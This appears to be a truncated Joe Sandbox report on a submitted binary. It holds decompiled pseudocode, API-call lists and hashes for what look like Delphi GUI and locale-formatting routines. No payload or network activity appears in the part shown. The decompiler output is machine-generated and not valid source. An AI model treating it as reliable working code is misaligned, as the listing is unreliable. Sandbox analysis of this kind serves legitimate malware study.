• Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
Yara matches
Similarity
• API ID: Cursor
• String ID: tC
• API String ID: 3268636600-1085749316
• Opcode ID: a178da6c9b4bbc368baccb1c65472ba58289c6c91f01dbbabba44e50dbd88129
• Instruction ID: 446e4450e0cf9451a988a13874b671d4eb8b623e4d71601eaa952d46317be944
• Opcode Fuzzy Hash: a178da6c9b4bbc368baccb1c65472ba58289c6c91f01dbbabba44e50dbd88129
• Instruction Fuzzy Hash: A6C14E71E00609CFEF10DFA9C98999EB7B1AF48304F14856AE801AB356D738EE41CB59
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                                                                                            			E0045B640(char __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				int _v12;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                            				struct tagPOINT _v32;
                                                                                                                                                                                                                            				char _v33;
                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                            				char _v44;
                                                                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                                                                            				struct HWND__* _v52;
                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                            				char _v60;
                                                                                                                                                                                                                            				struct tagRECT _v76;
                                                                                                                                                                                                                            				intOrPtr _v80;
                                                                                                                                                                                                                            				intOrPtr _v84;
                                                                                                                                                                                                                            				int _v88;
                                                                                                                                                                                                                            				int _v92;
                                                                                                                                                                                                                            				intOrPtr _v96;
                                                                                                                                                                                                                            				char _v100;
                                                                                                                                                                                                                            				struct tagRECT _v116;
                                                                                                                                                                                                                            				char _v132;
                                                                                                                                                                                                                            				intOrPtr _v136;
                                                                                                                                                                                                                            				char _v140;
                                                                                                                                                                                                                            				char _v144;
                                                                                                                                                                                                                            				char _v148;
                                                                                                                                                                                                                            				struct HWND__* _t130;
                                                                                                                                                                                                                            				struct HWND__* _t166;
                                                                                                                                                                                                                            				intOrPtr _t188;
                                                                                                                                                                                                                            				char _t194;
                                                                                                                                                                                                                            				intOrPtr _t218;
                                                                                                                                                                                                                            				intOrPtr _t222;
                                                                                                                                                                                                                            				void* _t238;
                                                                                                                                                                                                                            				intOrPtr* _t250;
                                                                                                                                                                                                                            				intOrPtr _t270;
                                                                                                                                                                                                                            				intOrPtr _t271;
                                                                                                                                                                                                                            				intOrPtr _t273;
                                                                                                                                                                                                                            				intOrPtr _t279;
                                                                                                                                                                                                                            				intOrPtr* _t306;
                                                                                                                                                                                                                            				intOrPtr _t307;
                                                                                                                                                                                                                            				void* _t314;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t313 = _t314;
                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                            				_v144 = 0;
                                                                                                                                                                                                                            				_v148 = 0;
                                                                                                                                                                                                                            				asm("movsd");
                                                                                                                                                                                                                            				asm("movsd");
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_t270 =  *0x451298; // 0x45129c
                                                                                                                                                                                                                            				E004053AC( &_v100, _t270);
                                                                                                                                                                                                                            				_t250 =  &_v8;
                                                                                                                                                                                                                            				_push(_t314);
                                                                                                                                                                                                                            				_push(0x45b9c6);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t314 + 0xffffff70;
                                                                                                                                                                                                                            				 *((char*)( *_t250 + 0x58)) = 0;
                                                                                                                                                                                                                            				if( *((char*)( *_t250 + 0x88)) == 0 ||  *((intOrPtr*)( *_t250 + 0x60)) == 0 || E004517CC() == 0 || E00458E30(E00439828( &_v16, 1)) !=  *((intOrPtr*)( *_t250 + 0x60))) {
                                                                                                                                                                                                                            					L23:
                                                                                                                                                                                                                            					_t130 = _v52;
                                                                                                                                                                                                                            					__eflags = _t130;
                                                                                                                                                                                                                            					if(_t130 <= 0) {
                                                                                                                                                                                                                            						E0045B3A8( *_t250);
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						E0045B1B0( *_t250, 0, _t130);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L26;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_v100 =  *((intOrPtr*)( *_t250 + 0x60));
                                                                                                                                                                                                                            					_v92 = _v16;
                                                                                                                                                                                                                            					_v88 = _v12;
                                                                                                                                                                                                                            					_v88 = _v88 + E0045B3E0();
                                                                                                                                                                                                                            					_v84 = E004581F4();
                                                                                                                                                                                                                            					_v80 =  *((intOrPtr*)( *_t250 + 0x5c));
                                                                                                                                                                                                                            					E0043A91C( *((intOrPtr*)( *_t250 + 0x60)),  &_v132);
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x60)))) + 0x40))();
                                                                                                                                                                                                                            					_v32.x = 0;
                                                                                                                                                                                                                            					_v32.y = 0;
                                                                                                                                                                                                                            					_t306 =  *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x60)) + 0x30));
                                                                                                                                                                                                                            					_t320 = _t306;
                                                                                                                                                                                                                            					if(_t306 == 0) {
                                                                                                                                                                                                                            						_t307 =  *((intOrPtr*)( *_t250 + 0x60));
                                                                                                                                                                                                                            						_t279 =  *0x437498; // 0x4374e4
                                                                                                                                                                                                                            						_t166 = E00403D78(_t307, _t279);
                                                                                                                                                                                                                            						__eflags = _t166;
                                                                                                                                                                                                                            						if(_t166 != 0) {
                                                                                                                                                                                                                            							__eflags =  *(_t307 + 0x190);
                                                                                                                                                                                                                            							if( *(_t307 + 0x190) != 0) {
                                                                                                                                                                                                                            								ClientToScreen( *(_t307 + 0x190),  &_v32);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						 *((intOrPtr*)( *_t306 + 0x40))();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					OffsetRect( &_v76, _v32.x - _v24, _v32.y - _v20);
                                                                                                                                                                                                                            					E0043AAC0( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &_v16);
                                                                                                                                                                                                                            					_v60 = _v140;
                                                                                                                                                                                                                            					_v56 = _v136;
                                                                                                                                                                                                                            					E00458DF8( *((intOrPtr*)( *_t250 + 0x60)),  &_v148);
                                                                                                                                                                                                                            					E0043809C(_v148,  &_v140,  &_v144, _t320);
                                                                                                                                                                                                                            					E00404A58( &_v44, _v144);
                                                                                                                                                                                                                            					_v52 = 0;
                                                                                                                                                                                                                            					_v48 =  *((intOrPtr*)( *_t250 + 0x74));
                                                                                                                                                                                                                            					_t188 =  *0x49be64; // 0x437a1c
                                                                                                                                                                                                                            					_v96 = _t188;
                                                                                                                                                                                                                            					_v40 = 0;
                                                                                                                                                                                                                            					_v33 = E0043C130( *((intOrPtr*)( *_t250 + 0x60)), 0, 0xb030,  &_v100) == 0;
                                                                                                                                                                                                                            					if(_v33 != 0 &&  *((short*)( *_t250 + 0x132)) != 0) {
                                                                                                                                                                                                                            						 *((intOrPtr*)( *_t250 + 0x130))( &_v100);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_v33 == 0 ||  *((intOrPtr*)( *_t250 + 0x60)) == 0) {
			_t194 = 0;
		} else {
			_t194 = 1;
		}
		_t285 =  *_t250;
		 *((char*)( *_t250 + 0x58)) = _t194;
		if( *((char*)( *_t250 + 0x58)) == 0) {
			goto L23;
		} else {
			_t327 = _v44;
			if(_v44 == 0) {
				goto L23;
			}
			E0045B534(_v96, _t285, _t313);
			 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0x70))();
			 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0xd8))( &_v116, _v40);
			OffsetRect( &_v116, _v92, _v88);
			if(E00403DE8( *((intOrPtr*)( *_t250 + 0x84)), _t327) != 0) {
				_t238 = E0045B594(_v44, _t250, 0xffc8, _t313) + 5;
				_v116.left = _v116.left - _t238;
				_v116.right = _v116.right - _t238;
			}
			E0043AA94( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &_v76);
			_t218 =  *_t250;
			 *((intOrPtr*)(_t218 + 0x64)) = _v140;
			 *((intOrPtr*)(_t218 + 0x68)) = _v136;
			E0043AA94( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &(_v76.right));
			_t222 =  *_t250;
			 *((intOrPtr*)(_t222 + 0x6c)) = _v140;
			 *((intOrPtr*)(_t222 + 0x70)) = _v136;
			E0043B11C( *((intOrPtr*)( *_t250 + 0x84)), _v80);
			 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0xd4))(_v40);
			E00458F44(_v44);
			_t231 = _v52;
			if(_v52 <= 0) {
				E0045B1B0( *_t250, 1, _v48);
			} else {
				E0045B1B0( *_t250, 0, _t231);
			}
			L26:
			_pop(_t271);
			 *[fs:eax] = _t271;
			_push(0x45b9cd);
			E004049E4( &_v148, 2);
			_t273 =  *0x451298; // 0x45129c
			return E0040547C( &_v100, _t273);
		}
	}
}
                                                                                                                                                                                                                            0x0045b939
                                                                                                                                                                                                                            0x0045b952
                                                                                                                                                                                                                            0x0045b958
                                                                                                                                                                                                                            0x0045b95d
                                                                                                                                                                                                                            0x0045b962
                                                                                                                                                                                                                            0x0045b978
                                                                                                                                                                                                                            0x0045b964
                                                                                                                                                                                                                            0x0045b96a
                                                                                                                                                                                                                            0x0045b96a
                                                                                                                                                                                                                            0x0045b99a
                                                                                                                                                                                                                            0x0045b99c
                                                                                                                                                                                                                            0x0045b99f
                                                                                                                                                                                                                            0x0045b9a2
                                                                                                                                                                                                                            0x0045b9b2
                                                                                                                                                                                                                            0x0045b9ba
                                                                                                                                                                                                                            0x0045b9c5
                                                                                                                                                                                                                            0x0045b9c5
                                                                                                                                                                                                                            0x0045b85a

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004517CC: GetActiveWindow.USER32 ref: 004517CF
                                                                                                                                                                                                                              • Part of subcall function 004517CC: GetCurrentThreadId.KERNEL32 ref: 004517E4
                                                                                                                                                                                                                              • Part of subcall function 004517CC: 73C9AC10.USER32(00000000,004517AC), ref: 004517EA
                                                                                                                                                                                                                              • Part of subcall function 0045B3E0: GetCursor.USER32(?), ref: 0045B3FB
                                                                                                                                                                                                                              • Part of subcall function 0045B3E0: GetIconInfo.USER32(00000000,?), ref: 0045B401
                                                                                                                                                                                                                            • ClientToScreen.USER32(?,?), ref: 0045B76C
                                                                                                                                                                                                                            • OffsetRect.USER32(?,?,?), ref: 0045B783
                                                                                                                                                                                                                            • OffsetRect.USER32(?,?,?), ref: 0045B8B3
                                                                                                                                                                                                                              • Part of subcall function 0045B1B0: SetTimer.USER32(00000000,00000000,?,00458E50), ref: 0045B1CA
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: OffsetRect$ActiveClientCurrentCursorIconInfoScreenThreadTimerWindow
                                                                                                                                                                                                                            • String ID: tC
                                                                                                                                                                                                                            • API String ID: 3022406661-1085749316
                                                                                                                                                                                                                            • Opcode ID: 3d652ba1a3436a72cfe8ea0ee2e08dc750de709dd5d5b2f6d499bfc4cb44fc42
                                                                                                                                                                                                                            • Instruction ID: 5094cc74829a0d0ddc56b95c8e280c0bc637037c8d8d66aa697b62fbdea552c2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3d652ba1a3436a72cfe8ea0ee2e08dc750de709dd5d5b2f6d499bfc4cb44fc42
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1FC1D675A006188FCB10EF68C485A9EB7F5FF49304F1440AAE905EB366DB34AD49CF95
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 74%
                                                                                                                                                                                                                            			E0043BC7C(void* __eax, intOrPtr __ecx, intOrPtr __edx, char _a4) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				char _v9;
                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                            				struct tagPOINT _v32;
                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                            				long _v40;
                                                                                                                                                                                                                            				char _v56;
                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                            				struct HWND__* _t57;
                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                            				char _t84;
                                                                                                                                                                                                                            				struct HWND__* _t108;
                                                                                                                                                                                                                            				void* _t110;
                                                                                                                                                                                                                            				intOrPtr _t134;
                                                                                                                                                                                                                            				intOrPtr _t137;
                                                                                                                                                                                                                            				void* _t141;
                                                                                                                                                                                                                            				void* _t142;
                                                                                                                                                                                                                            				struct HWND__* _t143;
                                                                                                                                                                                                                            				struct HWND__* _t147;
                                                                                                                                                                                                                            				void* _t152;
                                                                                                                                                                                                                            				void* _t154;
                                                                                                                                                                                                                            				intOrPtr _t155;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t152 = _t154;
                                                                                                                                                                                                                            				_t155 = _t154 + 0xffffffcc;
                                                                                                                                                                                                                            				_push(_t142);
                                                                                                                                                                                                                            				_v8 = __ecx;
                                                                                                                                                                                                                            				_t137 = __edx;
                                                                                                                                                                                                                            				_t110 = __eax;
                                                                                                                                                                                                                            				if(__edx == 0 || __edx == 0xffffffff) {
                                                                                                                                                                                                                            					_t57 =  *(_t110 + 0xa0);
                                                                                                                                                                                                                            					if(_t57 == 0 ||  *((char*)(_t57 + 0x1a7)) == 0 ||  *((intOrPtr*)(_t57 + 0x17c)) == 0) {
                                                                                                                                                                                                                            						E004197DC( *((intOrPtr*)(_t110 + 0x40)),  &_v40,  *((intOrPtr*)(_t110 + 0x44)), _t137, _t142);
                                                                                                                                                                                                                            						_v32.x = _v40;
                                                                                                                                                                                                                            						_v32.y = _v36;
                                                                                                                                                                                                                            						_t143 =  *(_t110 + 0x30);
                                                                                                                                                                                                                            						__eflags = _t143;
                                                                                                                                                                                                                            						if(_t143 != 0) {
                                                                                                                                                                                                                            							E0043AA94(_t143,  &_v40,  &_v32);
                                                                                                                                                                                                                            							_v32.x = _v40;
                                                                                                                                                                                                                            							_v32.y = _v36;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t57 + 0x17c)))) + 0x14))();
                                                                                                                                                                                                                            						MapWindowPoints(E00441704( *(_t110 + 0xa0)), 0,  &_v32, 2);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t63 = E0043AF0C(_t110);
                                                                                                                                                                                                                            					E0041982C(_v32.x, E0043AF20(_t110), _v32.y,  &_v56, _t63);
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					_v9 = E0043BE5C(_t110,  &_v32);
                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					E0043C164(__eax);
                                                                                                                                                                                                                            					__eflags =  *(_t110 + 0xa0);
                                                                                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                                                                                            						L12:
                                                                                                                                                                                                                            						_t84 = 1;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t108 = E00403DE8( *(_t110 + 0xa0), __eflags);
                                                                                                                                                                                                                            						__eflags = _t108;
                                                                                                                                                                                                                            						if(_t108 != 0) {
                                                                                                                                                                                                                            							goto L12;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_t84 = 0;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_v9 = _t84;
                                                                                                                                                                                                                            					__eflags = _v9;
                                                                                                                                                                                                                            					if(_v9 == 0) {
                                                                                                                                                                                                                            						L20:
                                                                                                                                                                                                                            						return _v9;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_v16 = E00438690(1, _t137);
                                                                                                                                                                                                                            						_push(_t152);
                                                                                                                                                                                                                            						_push(0x43be47);
                                                                                                                                                                                                                            						_push( *[fs:edx]);
                                                                                                                                                                                                                            						 *[fs:edx] = _t155;
                                                                                                                                                                                                                            						_t87 =  *(_t110 + 0xa0);
                                                                                                                                                                                                                            						__eflags =  *(_t110 + 0xa0);
                                                                                                                                                                                                                            						if( *(_t110 + 0xa0) == 0) {
                                                                                                                                                                                                                            							_t147 = 0;
                                                                                                                                                                                                                            							__eflags = 0;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_t147 = E00441704(_t87);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						E0043A91C(_t110,  &_v32);
                                                                                                                                                                                                                            						__eflags = _t147;
                                                                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                                                                            							MapWindowPoints(_t147, 0,  &_v32, 2);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						 *((intOrPtr*)(_v16 + 4)) = _t137;
                                                                                                                                                                                                                            						 *((char*)(_v16 + 0x54)) = _a4;
                                                                                                                                                                                                                            						 *((intOrPtr*)(_v16 + 0x58)) = _v8;
                                                                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                                                                            						_t141 = _t137;
                                                                                                                                                                                                                            						MapWindowPoints(0, E00441704(_t141),  &_v32, 1);
                                                                                                                                                                                                                            						_push(_v32.y);
                                                                                                                                                                                                                            						E00403DE8(_t141, __eflags);
                                                                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                                                                            						_pop(_t134);
                                                                                                                                                                                                                            						 *[fs:eax] = _t134;
                                                                                                                                                                                                                            						_push(0x43be4e);
                                                                                                                                                                                                                            						return E00403BEC(_v16);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}



























                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: PointsWindow
                                                                                                                                                                                                                            • String ID: `C
                                                                                                                                                                                                                            • API String ID: 4123100037-1847193361
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                            			E0040CC9C(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                            				char _v24;
                                                                                                                                                                                                                            				void* _t41;
                                                                                                                                                                                                                            				signed int _t45;
                                                                                                                                                                                                                            				signed int _t47;
                                                                                                                                                                                                                            				signed int _t49;
                                                                                                                                                                                                                            				signed int _t51;
                                                                                                                                                                                                                            				intOrPtr _t75;
                                                                                                                                                                                                                            				void* _t76;
                                                                                                                                                                                                                            				signed int _t77;
                                                                                                                                                                                                                            				signed int _t83;
                                                                                                                                                                                                                            				signed int _t92;
                                                                                                                                                                                                                            				intOrPtr _t111;
                                                                                                                                                                                                                            				void* _t122;
                                                                                                                                                                                                                            				void* _t124;
                                                                                                                                                                                                                            				intOrPtr _t127;
                                                                                                                                                                                                                            				void* _t128;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t128 = __eflags;
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_t122 = __edx;
                                                                                                                                                                                                                            				_t124 = __eax;
                                                                                                                                                                                                                            				_push(_t127);
                                                                                                                                                                                                                            				_push(0x40ce66);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t127;
                                                                                                                                                                                                                            				_t92 = 1;
                                                                                                                                                                                                                            				E004049C0(__edx);
                                                                                                                                                                                                                            				E0040C964(GetThreadLocale(), 0x40ce7c, 0x1009,  &_v12);
                                                                                                                                                                                                                            				if(E00409664(0x40ce7c, 1, _t128) + 0xfffffffd - 3 < 0) {
                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                            						_t41 = E00404C80(_t124);
                                                                                                                                                                                                                            						__eflags = _t92 - _t41;
                                                                                                                                                                                                                            						if(_t92 > _t41) {
                                                                                                                                                                                                                            							goto L28;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
                                                                                                                                                                                                                            						asm("bt [0x49b134], eax");
                                                                                                                                                                                                                            						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
                                                                                                                                                                                                                            							_t45 = E0040A0C8(_t124 + _t92 - 1, 2, 0x40ce80);
                                                                                                                                                                                                                            							__eflags = _t45;
                                                                                                                                                                                                                            							if(_t45 != 0) {
                                                                                                                                                                                                                            								_t47 = E0040A0C8(_t124 + _t92 - 1, 4, 0x40ce90);
                                                                                                                                                                                                                            								__eflags = _t47;
                                                                                                                                                                                                                            								if(_t47 != 0) {
                                                                                                                                                                                                                            									_t49 = E0040A0C8(_t124 + _t92 - 1, 2, 0x40cea8);
                                                                                                                                                                                                                            									__eflags = _t49;
                                                                                                                                                                                                                            									if(_t49 != 0) {
                                                                                                                                                                                                                            										_t51 =  *(_t124 + _t92 - 1) - 0x59;
                                                                                                                                                                                                                            										__eflags = _t51;
                                                                                                                                                                                                                            										if(_t51 == 0) {
                                                                                                                                                                                                                            											L24:
                                                                                                                                                                                                                            											E00404C88(_t122, 0x40cec0);
                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                            											__eflags = _t51 != 0x20;
                                                                                                                                                                                                                            											if(_t51 != 0x20) {
                                                                                                                                                                                                                            												E00404BA8();
                                                                                                                                                                                                                            												E00404C88(_t122, _v24);
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												goto L24;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                            										E00404C88(_t122, 0x40ceb4);
                                                                                                                                                                                                                            										_t92 = _t92 + 1;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									E00404C88(_t122, 0x40cea0);
                                                                                                                                                                                                                            									_t92 = _t92 + 3;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								E00404C88(_t122, 0x40ce8c);
                                                                                                                                                                                                                            								_t92 = _t92 + 1;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t92 = _t92 + 1;
                                                                                                                                                                                                                            							__eflags = _t92;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_v8 = E0040DD78(_t124, _t92);
                                                                                                                                                                                                                            							E00404EE0(_t124, _v8, _t92,  &_v20);
                                                                                                                                                                                                                            							E00404C88(_t122, _v20);
                                                                                                                                                                                                                            							_t92 = _t92 + _v8;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t75 =  *0x49e748; // 0x9
                                                                                                                                                                                                                            					_t76 = _t75 - 4;
                                                                                                                                                                                                                            					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
                                                                                                                                                                                                                            						_t77 = 1;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t77 = 0;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_t77 == 0) {
                                                                                                                                                                                                                            						E00404A14(_t122, _t124);
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						while(_t92 <= E00404C80(_t124)) {
                                                                                                                                                                                                                            							_t83 =  *(_t124 + _t92 - 1) - 0x47;
                                                                                                                                                                                                                            							__eflags = _t83;
                                                                                                                                                                                                                            							if(_t83 != 0) {
                                                                                                                                                                                                                            								__eflags = _t83 != 0x20;
                                                                                                                                                                                                                            								if(_t83 != 0x20) {
                                                                                                                                                                                                                            									E00404BA8();
                                                                                                                                                                                                                            									E00404C88(_t122, _v16);
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t92 = _t92 + 1;
                                                                                                                                                                                                                            							__eflags = _t92;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				L28:
                                                                                                                                                                                                                            				_pop(_t111);
                                                                                                                                                                                                                            				 *[fs:eax] = _t111;
                                                                                                                                                                                                                            				_push(E0040CE6D);
                                                                                                                                                                                                                            				return E004049E4( &_v24, 4);
                                                                                                                                                                                                                            			}


                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32(?,00000000,0040CE66,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040CCCB
                                                                                                                                                                                                                              • Part of subcall function 0040C964: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C982
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Locale$InfoThread
                                                                                                                                                                                                                            • String ID: eeee$ggg$yyyy
                                                                                                                                                                                                                            • API String ID: 4232894706-1253427255
                                                                                                                                                                                                                            • Opcode ID: d28100b5305c21fd00ac2895344e80118dbb898973983dfd69c2917494964e80
                                                                                                                                                                                                                            • Instruction ID: 4a597fd56ac0f87983323c6834d704910f88c0d9acca8889b228a53315074fe8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d28100b5305c21fd00ac2895344e80118dbb898973983dfd69c2917494964e80
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0541E5B0314504CBE711AB7AC8C12BEB69ADF85304BA1463BE542B37C5D63CED0782AD
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                                                                                            			E004392CC(intOrPtr __eax, intOrPtr __ecx, void* __edx, void* __fp0) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				struct tagPOINT _v20;
                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                            				char _v36;
                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				intOrPtr _t54;
